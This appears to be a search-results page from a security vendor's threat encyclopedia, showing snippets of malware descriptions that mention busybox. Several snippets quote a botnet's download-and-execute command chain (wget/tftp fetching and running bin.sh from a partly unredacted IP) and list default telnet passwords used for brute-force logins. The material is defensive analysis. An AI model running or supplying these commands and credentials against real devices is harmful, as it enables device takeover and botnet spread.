Search
Keyword: busybox
19 Total Search |
Showing Results : 1 - 19
commands to download and execute a file in the remote computer: cd /tmp; busybox wget http://{BLOCKED}9.{BLOCKED}3.37.115/.{BLOCKED}ggers/bin.sh; busybox tftp -r bin.sh -g {BLOCKED}9.{BLOCKED}3.37.115;sh
pass password support toor 123456 If it was able to successfully log into the system, it sends the following commands to download and execute a file in the remote computer: cd /tmp; busybox wget http://
file in the remote computer: cd /tmp; busybox wget http://{BLOCKED}9.{BLOCKED}3.37.115/.{BLOCKED}ggers/bin.sh; busybox tftp -r bin.sh -g 69.163.37.115;sh bin.sh; echo -e '\x62\x69\x6e\x66\x61\x67\x74' cd
It exploits an Android vulnerability ( CVE-2012-6422 ) to gain root privilege. It then proceeds to install busybox and su to /system/xbin/ . Figure 1. Installing busybox Figure 2. Installing su
{BLOCKED}.143.98:259 Other Details This Backdoor does the following: It uses the following credentials to try to login to busybox telnet and used security/ misconfiguration/ default password: telecomadmin
reboot To unroot, it extracts first busybox to $x , and then runs the following commands: $x/busybox mount -o remount,rw /system $x/busybox rm /system/bin/su $x/busybox rm /system/xbin/su $x/busybox rm
Backdoor Routine This Backdoor executes the following commands from a remote malicious user: Clean device by doing the following: It terminates processes that contains the following strings: busybox python
telarmv5 telarmv4tl telarmv4 telarmv6 teli686 telpowerpc telpowerpc440fp teli586 telm68k telsparc telx86_64 TwoFace* xxb* bb busybotnet busybox badbox B1 B2 B3 B4 B5 B6 B7 B8 B9 B10 B11 B12 B13 B14 B15 B16
\checkupdate.exe %Program Files%\Kingo ROOT\feedback.exe %Program Files%\Kingo ROOT\files %Program Files%\Kingo ROOT\files\busybox %Program Files%\Kingo ROOT\files\checksum %Program Files%\Kingo ROOT\files
}.tmp %Program Files%\Kingo ROOT\Components\qmldir %Program Files%\Kingo ROOT\feedback.exe %Program Files%\Kingo ROOT\files\busybox %Program Files%\Kingo ROOT\files\checksum %Program Files%\Kingo ROOT
This Worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It takes advantage of software vulnerabilities to
This malware is involved in the Bash Vulnerability Exploit attack of September 2014. It is capable of compromising an affected system's security by carrying out commands made by a malicious remote
This malware is involved in the Bash Vulnerability Exploit attack of September 2014. It is capable of compromising an affected system's security by carrying out commands made by a malicious remote
This malware is involved in the Bash Vulnerability Exploit attack of September 2014. It is capable of compromising an affected system's security by carrying out commands made by a malicious remote
This malware is involved in the Bash Vulnerability Exploit attack of September 2014. It is capable of compromising an affected system's security by carrying out commands made by a malicious remote
This malware is involved in the Bash Vulnerability Exploit attack of September 2014. It is capable of compromising an affected system's security by carrying out commands made by a malicious remote
This malware is involved in the Bash Vulnerability Exploit attack of September 2014. It is capable of compromising an affected system's security by carrying out commands made by a malicious remote
%AppDataLocal%\Mobogenie\Version\NewVersion\Mobogenie\busybox %AppDataLocal%\Mobogenie\Version\NewVersion\Mobogenie\configure.mu %AppDataLocal%\Mobogenie\Version\NewVersion\Mobogenie\DaemonProcess.exe
This Backdoor listens on port(s). It connects to a website to send and receive information. Arrival Details This Backdoor may be downloaded from the following remote site(s): {BLOCKED}.{BLOCKED